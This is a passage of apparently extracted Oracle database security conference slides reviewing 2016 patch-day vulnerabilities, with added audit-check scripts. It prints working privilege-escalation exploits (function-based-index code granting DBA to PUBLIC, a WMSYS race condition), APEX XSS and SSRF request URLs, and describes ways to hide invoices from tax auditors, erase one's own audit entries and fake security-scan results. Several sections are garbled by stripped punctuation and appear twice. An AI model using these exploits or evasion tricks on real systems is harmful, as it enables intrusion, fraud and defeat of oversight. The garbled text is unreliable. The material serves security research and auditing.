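-- 5. Who rewrites statements: VPD policies, redaction policies, translation profiles?
SELECT 'VPD' AS kind, object_owner, object_name, policy_name,
       pf_owner || '.' || package || '.' || function AS implementation, enable
  FROM dba_policies
UNION ALL
SELECT 'REDACTION', object_owner, object_name, policy_name, expression, enable
  FROM redaction_policies
 ORDER BY 1, 2, 3;

SELECT p.owner, p.profile_name, p.translator, p.translate_new_sql,
       (SELECT COUNT(*) FROM dba_sql_translations s
         WHERE s.owner = p.owner AND s.profile_name = p.profile_name) AS translations
  FROM dba_sql_translation_profiles p;
-- A profile only applies when it is set for the session or the instance:
SELECT name, value FROM v$parameter WHERE name = 'sql_translation_profile';

-- 6. Fingerprint the views the SIEM and the checklist rely on; compare against a
--    known-good hash kept outside the database. DBA_VIEWS.TEXT is a LONG, so the
--    hash is computed in PL/SQL (TEXT_VC would truncate at 4000 characters).
DECLARE
  l_text VARCHAR2(32767);
BEGIN
  FOR v IN (SELECT owner, view_name, text
              FROM dba_views
             WHERE owner = 'SYS'
               AND view_name IN ('DBA_AUDIT_TRAIL', 'DBA_USERS', 'DBA_ROLE_PRIVS'))
  LOOP
    l_text := v.text;   -- LONG to VARCHAR2 is only possible inside PL/SQL
    DBMS_OUTPUT.PUT_LINE(RPAD(v.owner || '.' || v.view_name, 30) ||
      RAWTOHEX(DBMS_CRYPTO.HASH(UTL_RAW.CAST_TO_RAW(l_text), DBMS_CRYPTO.HASH_SH256)));
  END LOOP;
END;
/
```

Run the script once on a freshly patched, trusted instance and store its output (especially the view hashes) outside the database; a later run that differs in any of the six sections is the signal that one of the rewriting features above has been switched on.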
Modifying Queries on the fly
Powerful features for applications
(Huge) potential on critical systems to modify application logic (e.g. DB Vault)
DBAs and Auditors / Security Department should be aware of powerful Oracle
features which could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 12.2 required (new features, new packages, ...)
Migration to 12.2
More auditing projects
Integration of auditing with SIEM solutions
Q & A
Thank you
Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
2016
January 2016
Oracle CPU January 2016
Exploiting the Oracle Workspace Manager SQL
Race Condition (David Litchfield)
DB Database Assessment Tool
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html httpwwwdavidlitchfieldcomExploitingtheOracleWorkspaceManagerSQLRaceConditionpdf httpsgithubcomfoospidyDbDat
January 2016 CPU
7 security fixes (No remote exploitable)
1 Java VM (CVSS 90)
1 Workspace Manager (CVSS 65)
2 XML Database (CVSS 55 40)
1 Database Vault (CVSS 40)
1 Security (CVSS 40)
1 XML Developerrsquos Kit (CVSS 40)
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html
Jan 2016 CPU- CVE-2016-0467
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Oracle native auditing fails to capture
bdquoCreate Java Sourceldquo
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
Jan 2016 CPU- CVE-2015-4921
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Status is incorrectly reported if SYS
Auditing is used together with DB Vault
Reporter David Litchfield
Jan 2016 CPU- CVE-2015-4925
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Privilege escalation via Race Condition
in WMSYSLTCOPYFORUPDATE
Reporter David Litchfield
The Oracle Workspace Manager allows a user to version enable database tables This is achieved by creating workspaces which contain the versioned data The Workspace Manager contains a number of PLSQL packages that are used to manage workspaces To function correctly some management actions must be performed with higher privileges than a normal user might have and so to enable this some of the management functions execute with the privileges of the WMSYS user The main workspace manager interface is the LT PLSQL package and this executes with the privileges of the user that calls or invokes LT When privileged work is required to be executed LT calls the LTADM package The LTADM package executes with the privileges of the owner or definer in this case WMSYS WMSYS has a number of very powerful privileges such as CREATE ANY TRIGGER that allows the grantee the privilege to create a trigger in any schema with the exception of the SYS schema
Jan 2016 CPU- CVE-2015-4925
SELECT COUNT() INTO CNTFROM V$OPEN_CURSOR OC V$SQL S V$OBJECT_DEPENDENCY OD WHERE OCSID = USER_SID AND [hellip] AND ODTO_TYPE IN (78911)
Here ODTO_TYPEs 789 and 11 are functions procedures packages and objects If any such dependency exists then the user supplied query will not be executed and an error is raised IF (CNTgt0) THEN WMSYSWM_ERRORRAISEERROR(WMSYSLTWM_ERROR_81_NO) END IF
SQL_STR2 =declaredelstatuses wmsysltUtilnumber_tab beginselect WM_delstatus bulk collect into delstatusesfrom || WMSYSLTUTILGETVN(TABLE_OWNER TAB_NAME _BASE) || where WM_version = || CURVER || and || NEWWHERE_CLAUSE || for updateend WMSYSLTADMEXECSQL(SQL_STR2)
Jan 2016 CPU- CVE-2015-4925SQLgt CONNECT RACERPASSWORD SQLgt CREATE TABLE FOO(X NUMBER CONSTRAINT X_PK PRIMARY KEY(X)) SQLgt INSERT INTO FOO (X) VALUES (1) SQLgt COMMITSQLgt EXEC WMSYSLTENABLEVERSIONING(sbquoFOO)
SQLgt create or replace function Y return number authid current_user is 2 pragma autonomous_transaction3 begin4 dbms_outputput_line(BANG)5 execute immediate create or replace procedure owned(p varchar) is begin execute immediate p end6 execute immediate grant execute on owned to public7 dbms_outputput_line(sys_context(userenvcurrent_user)) 8 return 19 end 10
Jan 2016 CPU- CVE-2015-4925SQLgt GRANT EXECUTE ON Y TO PUBLIC SQLgt CREATE TABLE RACER(Y NUMBER) SQLgt INSERT INTO RACER(Y) VALUES (1) SQLgt COMMIT
SQLgt create or replace procedure attempt_it is 2 begin 3 execute immediate BEGIN WMSYSLTCOPYFORUPDATE(FOOX=LENGTH((SELECT 1 FROM RACERRACER WHERE RACERY=1))) END 4 exception when others then 5 null6 end7 SQLgt declare2 i number=0 3 begin4 for i in 11000 loop 5 execute immediate alter table RACERRACER rename column Y to Z6 execute immediate alter table RACERRACER rename column Z to Y7 end loop 8 end9
Jan 2016 CPU- CVE-2015-4925
SQLgt DESC WMSYSOWNED
PROCEDURE WMSYSOWNED Argument Name Type InOut Default mdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdash-
P VARCHAR2 IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 9.0)
1 JDBC (CVSS 8.1, remote)
1 Portable Clusterware (CVSS 7.5, remote)
1 Data Pump (CVSS 6.7)
2 APEX (CVSS 6.1, 5.8; 2 remote)
1 RDBMS Security (CVSS 5.3, remote)
1 DB Sharding (CVSS 4.4)
1 Database Vault (CVSS 3.4)
http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
Jul 2016 CPU - CVE-2016-3448
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: The HTMLDB_UTIL PL/SQL package is vulnerable to an XSS flaw. To access it, the schema (APEX_050000) needs to be specified first, however, because the config file whitelists apex.
Reporter: David Litchfield
Exploit:
http://example.com/ords/apex_050000.htmldb_util.JSON_FROM_ARRAY?P_COLS=1&P_NAME01=XX%22%3E%3CH1%3EOops%3C/H1%3E&P_F01=Y&P_ROWS=1
Jul 2016 CPU - CVE-2016-3467
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: APEX 5 is vulnerable to a server-side request forgery flaw, i.e. it can be made to connect to another web server and port regardless of whether allowed URLs have been configured. For example, the request below will connect to someotherserver on the given port and POST "X" as a payload. This can be used as a port scanning mechanism, to attack systems protected by a firewall, etc.
Reporter: David Litchfield
Exploit:
http://example/ords/apex_050000.WWV_FLOW_WEBSERVICES_API.MAKE_REQUEST?P_URL=http://someotherserver:port&p_envelope=X
Jul 2016 CPU - CVE-2016-3488
Problem: The package dbms_gsm_common allows database parameters to be changed without the admin privileges and without a restart.
Reporter: Bruno Cirone
Exploit:
exec gsmadmin_internal.dbms_gsm_common.setdbparameter('O7_DICTIONARY_ACCESSIBILITY','TRUE');
Jul 2016 CPU - CVE-2016-3488
-- as SYS
SQL> select name, value from v$parameter where name='O7_DICTIONARY_ACCESSIBILITY';
O7_DICTIONARY_ACCESSIBILITY   FALSE
-- as user GSMUSER
SQL> exec gsmadmin_internal.dbms_gsm_common.setdbparameter('O7_DICTIONARY_ACCESSIBILITY','TRUE');
PL/SQL-Prozedur erfolgreich abgeschlossen.
-- as user SYS: re-run the query after execution of the package
SQL> select name, value from v$parameter where name='O7_DICTIONARY_ACCESSIBILITY';
O7_DICTIONARY_ACCESSIBILITY   TRUE
July 2016 CPU - CVE-2016-3484
Problem: SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter: Alexander Kornbrust
Problem (details + exploit later...):
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN
    RETURN 'N';
  END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN
    RETURN 'N';
  END IF;
  RETURN 'Y';
END;
July 2016 CPU - CVE-2016-3489
Problem: Privilege escalation via INDEX privilege and function based index (FBI)
Reporter: Alexander Kornbrust
July 2016 CPU - CVE-2016-3489
-- Oracle 11.2.0.4
SYSTEM@SQL> select grantee, owner, table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = 'INDEX' AND GRANTEE != OWNER and owner='SYS';
GRANTEE    OWNER    TABLE_NAME
---------- -------- ----------
SYSTEM     SYS      INCEXP
SYSTEM     SYS      INCFIL
SYSTEM     SYS      INCVID

SYSTEM@SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
              PRAGMA AUTONOMOUS_TRANSACTION;
            BEGIN
              execute immediate 'grant select on sys.link$ to public';
              COMMIT;
              RETURN FOO;
            END;
            /
SQL> grant execute on getdba to public;
July 2016 CPU - CVE-2016-3489
==> SYSTEM does not have access to the SYS.LINK$ table
SQL> select count(*) from sys.link$;
ERROR at line 1:
ORA-01031: insufficient privileges
==> also the execution of getdba throws an error
SQL> select getdba('i') from dual;
ERROR at line 1:
ORA-01031: insufficient privileges
ORA-06512: at "SYSTEM.GETDBA", line 4
==> Now create an index on the table sys.incvid using a function based index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA('AK'));
Index created.
SQL> select count(*) from sys.link$;
  COUNT(*)
----------
        11
July 2016 CPU - CVE-2016-3489
-- Oracle 12.1.0.2 (SYSTEM no longer has INHERIT ANY PRIVILEGE)
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA('1'));
CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA('1'))
FEHLER in Zeile 1:
ORA-06598: Nicht ausreichende INHERIT PRIVILEGES-Berechtigung
ORA-06512: in "SYSTEM.GETDBA", Zeile 1
-- On 12.1.0.2 the user WMSYS has CREATE ANY INDEX, and the SYSTEM user can use
-- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsys.GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  execute immediate 'grant select on sys.link$ to public';
  COMMIT;
  RETURN FOO;
END;
/
SQL> grant execute on wmsys.getdba to public;
-- now we create the index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(WMSYS.GETDBA('AK'));
August 2016
Hackproofing Oracle's eBusiness Suite by David Litchfield
Presentation + supporting documents:
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5.pdf
September 2016
Nothing special happened
October 2016
Oracle CPU October 2016
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 9.1)
2 Kernel PDB (CVSS 6.4, 6.0)
3 RDBMS Security (CVSS 6.4, 3.3, 3.3)
1 APEX (CVSS 6.1, remote)
1 RDBMS Security & SQL*Plus (CVSS 2.4)
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
Oct 2016 CPU - CVE-2016-5497
Problem: UNSALTED MD5 HASH STILL PRESENT IN 12C DATABASE - DIGEST VERIFIER
Shown as an open problem at the DOAG 2015 presentation
Reporter: Alexander Kornbrust
Oracle Password Hash 12.1.0.2+
Oracle 12.1.0.2 introduced a new PBKDF2 SHA512 based algorithm.
The new "T:" password hash is 10 times slower than the old DES hash (Oracle 7+) and 88 times slower than the SHA1-based hash (Oracle 11+).
The new algorithm is known and already implemented in some tools.
Remark: Microsoft Office 2013 is 10 times more time consuming to crack than the new Oracle PBKDF2.
Oracle Password Hash 12.1.0.2+
Let's have a look at RFC 2617:
KD(secret, data) = H(concat(secret, ":", data))
No salt, but a secret:
Secret = 'XDB'
and the hash will be MD5('XDB:tiger'),
stored in the spare4 column, starting with "H:" (the digest hash).
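As an added example (not code from the slides or from Red-Database-Security), the following Python computes the digest verifier the way the slide formulates it (MD5 over 'XDB:' + password, in the RFC 2617 KD style), contrasts it with a generic salted PBKDF2-HMAC-SHA512 verifier, and scans spare4 values for accounts that still carry an H: segment. The spare4 rows, the S:/H:/T: segment layout, the salt length and the iteration count are assumptions for the illustration, not a byte-exact reimplementation of Oracle's verifiers.

```python
import hashlib
import os

DIGEST_SECRET = "XDB"  # the fixed "secret" of the digest verifier as given on the slide


def digest_verifier(password):
    """Digest verifier as formulated on the slide: MD5(concat(secret, ':', data))
    with secret = 'XDB' and data = the password. There is no per-user salt, so the
    value is a function of the password alone and can be precomputed once for all
    accounts."""
    return hashlib.md5("{}:{}".format(DIGEST_SECRET, password).encode()).hexdigest().upper()


def salted_verifier(password, salt=None, iterations=4096):
    """Generic salted PBKDF2-HMAC-SHA512 verifier for comparison. Salt length and
    iteration count are assumptions for this example, not Oracle's exact 'T:'
    construction. Returns (salt_hex, hash_hex)."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha512", password.encode(), salt, iterations)
    return salt.hex().upper(), dk.hex().upper()


def spare4_segments(spare4):
    """Split a spare4 value laid out as 'S:<hex>;H:<hex>;T:<hex>' into
    {prefix: hex}. The segment layout is assumed for this example."""
    segments = {}
    for seg in spare4.split(";"):
        if ":" in seg:
            prefix, value = seg.split(":", 1)
            segments[prefix.strip()] = value.strip()
    return segments


def users_with_digest_verifier(rows):
    """rows: (name, spare4) tuples as fetched by SELECT name, spare4 FROM sys.user$.
    Returns the accounts whose verifier set still contains an 'H:' segment, i.e.
    the unsalted digest the slide is about."""
    return [name for name, spare4 in rows if spare4 and "H" in spare4_segments(spare4)]


def verifier_properties(password):
    """Side-by-side properties of the two constructions for one password."""
    salt_a, hash_a = salted_verifier(password)
    _, hash_b = salted_verifier(password)
    _, hash_a_again = salted_verifier(password, bytes.fromhex(salt_a))
    return {
        "digest_hex_length": len(digest_verifier(password)),
        "digest_is_deterministic": digest_verifier(password) == digest_verifier(password),
        "salted_differs_per_salt": hash_a != hash_b,
        "salted_repeats_with_same_salt": hash_a == hash_a_again,
    }


# Constructed sample rows (not real dictionary data): SCOTT and REPORTING still carry
# an H: segment next to the S: and T: verifiers; APP does not.
SAMPLE_USER_ROWS = [
    ("SCOTT", "S:" + "0" * 60 + ";H:" + digest_verifier("tiger") + ";T:" + "1" * 160),
    ("APP", "S:" + "2" * 60 + ";T:" + "3" * 160),
    ("REPORTING", "H:" + digest_verifier("tiger")),
]

if __name__ == "__main__":
    print("accounts with an H: verifier:", users_with_digest_verifier(SAMPLE_USER_ROWS))
    print(verifier_properties("tiger"))
```

The point of the comparison is visible in `verifier_properties`: the digest value never changes for a given password, while the salted construction yields a different value for every salt and can only be recomputed per account. `users_with_digest_verifier` is the check a DBA would run over the real `sys.user$` rows to see which accounts still expose the digest.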
Oct 2016 CPU - CVE-2016-5516
Problem: In Oracle 12c the DBMS_PDB_EXEC_SQL procedure is a wrapper for the DBMS_PDB.EXEC_AS_ORACLE_SCRIPT procedure, which executes SQL as the SYS user. The XDB user has the execute privilege on DBMS_PDB_EXEC_SQL, and as such, by first exploiting a vulnerability in a publicly executable XDB-owned PL/SQL object, an attacker can leverage this privilege to execute SQL as SYS. The fix changes both DBMS_PDB_EXEC_SQL and DBMS_PDB from the DEFINER rights to the INVOKER rights execution model.
Reporter: David Litchfield
Oct 2016 CPU - CVE-2016-5604
Problem: Privilege Escalation in Oracle Cloud Control (12.1.3)
Reporter: Alexander Kornbrust
sqlplus sysman_apm/rds@ora1
SQL> desc dba_users
ERROR:
ORA-04043: object SYS.DBA_USERS does not exist
==> user does not have the privilege to access DBA_USERS
SQL> select * from user_sys_privs;
USERNAME                       PRIVILEGE                                ADM
------------------------------ ---------------------------------------- ---
SYSMAN_APM                     UNLIMITED TABLESPACE                     NO
SYSMAN_APM                     CREATE VIEW                              NO
SYSMAN_APM                     CREATE ANY LIBRARY                       NO
SYSMAN_APM                     CREATE SEQUENCE                          NO
SYSMAN_APM                     CREATE TABLE                             NO
SYSMAN_APM                     CREATE LIBRARY                           NO
SYSMAN_APM                     CREATE ANY INDEX                         NO
==> CREATE ANY LIBRARY privilege is granted to SYSMAN_APM
SQL> select * from user_role_privs;
USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYSMAN_APM                     CONNECT                        NO  YES NO
SYSMAN_APM                     RESOURCE                       NO  YES NO
==> Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER
SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
       PRAGMA AUTONOMOUS_TRANSACTION;
     BEGIN
       execute immediate 'grant dba to public';
       COMMIT;
       RETURN FOO;
     END;
     /
==> Grant execution privileges to PUBLIC
SQL> grant execute on getdba to public;
==> Create an index on SYSTEM.HELP using a function based index (FBI); the function getdba is used for the function based index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYSTEM.HELP(SYSMAN_APM.GETDBA('AK2'));
==> Reconnect is necessary
SQL> select * from dba_role_privs where granted_role='DBA' and grantee='PUBLIC';
GRANTEE                        GRANTED_ROLE                   ADM DEF
------------------------------ ------------------------------ --- ---
PUBLIC                         DBA                            NO  YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
A top manager comes to the office of the DBA and asks you: "Tomorrow the auditor from the tax authority will come to check our invoices. Could you hide the 10000 EUR invoice from the last party at the night club just from the auditor? I will increase your salary..."
Scenario 2
Remove your own audit entries from the audit log, which is retrieved by the SIEM solution (e.g. Splunk, QRadar, ...) via JDBC.
Scenario 3
You don't have time to harden all your databases, but the security department wants to see results. Instead of fixing the problem, you will just deliver the proper results.
A lot of different wishes...
but luckily we are using Oracle
Problem & Solution
Oracle offers different features to fulfill these wishes without affecting other users...
All these scenarios have in common that we have to manipulate the SQL statement:
Select value ...
Oracle Data Redaction allows masking or manipulating the selected data just for a single database user.
Possible usage: replace true/false, replace USER/ADMIN, ...
The DBA can decide what will be returned.
Select value ...
A typical query from security checklists/scanners looks like this:
select upper(value) from parameter where upper(name) = 'XYZ'
The tool expects the value TRUE, but the database contains FALSE.
Oracle Data Redaction allows you to change the result value from FALSE to TRUE.
==> The audit department is happy because the database passes all the security checks...
... from table/view ...
Modifying objects can be used as a man in the middle as well.
Possible approaches:
modify views (e.g. add a condition such as spare != 'DBA1' to the view dba_audit_trail): all entries of the OS user DBA1 will be removed in the view, so if a SIEM solution retrieves the audit data, the entries from DBA1 are not retrieved
create or change synonyms to "redirect" objects
replace a table with a view plus an instead-of trigger
--------- dbms_macadm ---------
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN
    RETURN 'N';
  END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN
    RETURN 'N';
  END IF;
  RETURN 'Y';
END;
SQL> create or replace view mydual as select 'X' as dummy from dual where user='DVSYS';
SQL> grant select on sys.mydual to public;
SQL> drop public synonym dual;
SQL> create public synonym dual for sys.mydual;
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
... where x=y
Where conditions can be changed using VPD.
VPD: add the where clause invoice_name != 'SAUNA_CLUB CHANTAL'
Hide "certain" invoices from the audit department.
Select value from table/view where x=y
The SQL Translation Framework (12c only) allows an entire query to be replaced: the user submits Query A, and the SQL Translation Framework replaces Query A with Query B.
Possible Countermeasures for paranoid Auditors
Add a random string (e.g. aksdjhiuz) to the query to avoid the SQL Translation Framework (new SQL_ID)
Try to get EXEMPT ACCESS POLICY to disable VPD (even if not used in the application)
Use fully qualified names instead of synonyms (e.g. SYS.DUAL instead of DUAL)
Always check the object type (is it really a table?)
Use checksums for certain database objects (especially views)
Check the current schema to avoid attacks (e.g. alter session set current_schema=otheruser)
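The countermeasures above, together with the redaction, view, synonym and VPD tricks described before them, can be scripted into one pre-flight check an auditor runs before trusting any query result. The following Python is an added example, not tooling from the slides or from Red-Database-Security: the dictionary queries in CHECK_QUERIES are what the auditing session would execute (through SQL*Plus or python-oracledb, not shown here), and the evaluator functions take the fetched rows. The rows at the bottom are constructed, with one redirected DUAL synonym, one VPD policy and one altered view, so the logic runs offline; the baseline checksum, the view name, the expected schema and the column tuples are assumptions.

```python
import hashlib
import secrets

# Dictionary queries for the auditor's session. Where a query reads DUAL it is
# written as SYS.DUAL, so the check itself is not fooled by a redirected synonym.
CHECK_QUERIES = {
    # Fully qualified names / object type: what does the name DUAL resolve to?
    "dual_resolution": (
        "SELECT s.owner, s.synonym_name, s.table_owner, s.table_name, o.object_type "
        "FROM dba_synonyms s JOIN dba_objects o "
        "ON o.owner = s.table_owner AND o.object_name = s.table_name "
        "WHERE s.synonym_name = 'DUAL'"
    ),
    # VPD policies that could add a WHERE clause to the tables being audited.
    "vpd_policies": (
        "SELECT object_owner, object_name, policy_name, function, enable FROM dba_policies"
    ),
    # Data Redaction policies that could rewrite returned values for one user.
    "redaction_policies": (
        "SELECT object_owner, object_name, policy_name, enable FROM redaction_policies"
    ),
    # SQL Translation Framework profiles (12c) that could swap Query A for Query B.
    "sql_translation_profiles": "SELECT owner, profile_name FROM dba_sql_translation_profiles",
    # Current schema of this session must be the expected one.
    "current_schema": "SELECT sys_context('USERENV', 'CURRENT_SCHEMA') FROM sys.dual",
    # DDL text of a view, for checksumming against a baseline taken on a trusted system.
    "view_ddl": "SELECT dbms_metadata.get_ddl('VIEW', :view_name, 'SYS') FROM sys.dual",
}

EXPECTED_DUAL = ("SYS", "DUAL", "TABLE")


def check_dual_resolution(rows):
    """rows: (owner, synonym_name, table_owner, table_name, object_type) tuples."""
    findings = []
    for owner, syn, tgt_owner, tgt_name, otype in rows:
        if (tgt_owner, tgt_name, otype) != EXPECTED_DUAL:
            findings.append("synonym {}.{} resolves to {}.{} ({}); expected SYS.DUAL (TABLE)"
                            .format(owner, syn, tgt_owner, tgt_name, otype))
    return findings


def check_policies(kind, rows):
    """Every VPD, redaction or translation policy must be explained before results
    are trusted, so each row becomes a finding."""
    return ["{}: {}".format(kind, " / ".join(str(col) for col in row)) for row in rows]


def check_current_schema(actual, expected):
    return [] if actual == expected else ["current_schema is {}, expected {}".format(actual, expected)]


def view_checksum(ddl_text):
    """SHA-256 over whitespace-normalised, upper-cased DDL: formatting differences do
    not raise alarms, an added predicate does."""
    normalised = " ".join(ddl_text.upper().split())
    return hashlib.sha256(normalised.encode()).hexdigest()


def check_view_checksums(ddl_by_view, baseline):
    """ddl_by_view: {view: DDL fetched now}; baseline: {view: sha256 recorded earlier}."""
    findings = []
    for name, ddl in ddl_by_view.items():
        current = view_checksum(ddl)
        if baseline.get(name) != current:
            findings.append("view {}: checksum {}... differs from baseline".format(name, current[:16]))
    return findings


def with_nonce(sql):
    """Append a random comment: the statement text (and so its SQL_ID) is new, so a
    translation registered for the exact original text no longer matches."""
    return "{} /* {} */".format(sql, secrets.token_hex(8))


def run_checks(dual_rows, policy_rows, current_schema, expected_schema, ddl_by_view, baseline):
    findings = check_dual_resolution(dual_rows)
    for kind, rows in policy_rows.items():
        findings += check_policies(kind, rows)
    findings += check_current_schema(current_schema, expected_schema)
    findings += check_view_checksums(ddl_by_view, baseline)
    return findings


# Constructed sample rows (not from a real database): PUBLIC.DUAL was redirected to
# a view SYS.MYDUAL, one VPD policy exists, and the audit view gained a predicate.
TRUSTED_DDL = "CREATE OR REPLACE VIEW SYS.DBA_AUDIT_TRAIL AS SELECT * FROM SYS.AUD$ A"
BASELINE = {"DBA_AUDIT_TRAIL": view_checksum(TRUSTED_DDL)}
SAMPLE_DUAL_ROWS = [("PUBLIC", "DUAL", "SYS", "MYDUAL", "VIEW")]
SAMPLE_POLICY_ROWS = {
    "vpd_policies": [("FINANCE", "INVOICES", "HIDE_ROWS", "INVOICE_PREDICATE", "YES")],
    "redaction_policies": [],
    "sql_translation_profiles": [],
}
SAMPLE_DDL_NOW = {"DBA_AUDIT_TRAIL": TRUSTED_DDL + " WHERE A.SPARE1 != 'DBA1'"}

if __name__ == "__main__":
    for line in run_checks(SAMPLE_DUAL_ROWS, SAMPLE_POLICY_ROWS, "SYSTEM", "AUDITOR",
                           SAMPLE_DDL_NOW, BASELINE):
        print("FINDING:", line)
```

Run the queries in CHECK_QUERIES first, feed the fetched rows into `run_checks`, and wrap each audit query with `with_nonce` before executing it; an empty finding list is the precondition for trusting what the audit queries return.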
Modifying Queries on the fly
Powerful features for applications
(Huge) potential on critical systems to modify application logic (e.g. DB Vault)
DBAs and auditors/security departments should be aware of powerful Oracle features which could be used to modify application logic
Audit these features even if they are not in use
Trends 2017
New hardening documents for Oracle 12.2 required (new features, new packages, ...)
Migration to 12.2
More auditing projects
Integration of auditing with SIEM solutions
Q & A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
January 2016
Oracle CPU January 2016
Exploiting the Oracle Workspace Manager SQL
Race Condition (David Litchfield)
DB Database Assessment Tool
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html httpwwwdavidlitchfieldcomExploitingtheOracleWorkspaceManagerSQLRaceConditionpdf httpsgithubcomfoospidyDbDat
January 2016 CPU
7 security fixes (No remote exploitable)
1 Java VM (CVSS 90)
1 Workspace Manager (CVSS 65)
2 XML Database (CVSS 55 40)
1 Database Vault (CVSS 40)
1 Security (CVSS 40)
1 XML Developerrsquos Kit (CVSS 40)
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html
Jan 2016 CPU- CVE-2016-0467
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Oracle native auditing fails to capture
bdquoCreate Java Sourceldquo
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
Jan 2016 CPU- CVE-2015-4921
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Status is incorrectly reported if SYS
Auditing is used together with DB Vault
Reporter David Litchfield
Jan 2016 CPU- CVE-2015-4925
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Privilege escalation via Race Condition
in WMSYSLTCOPYFORUPDATE
Reporter David Litchfield
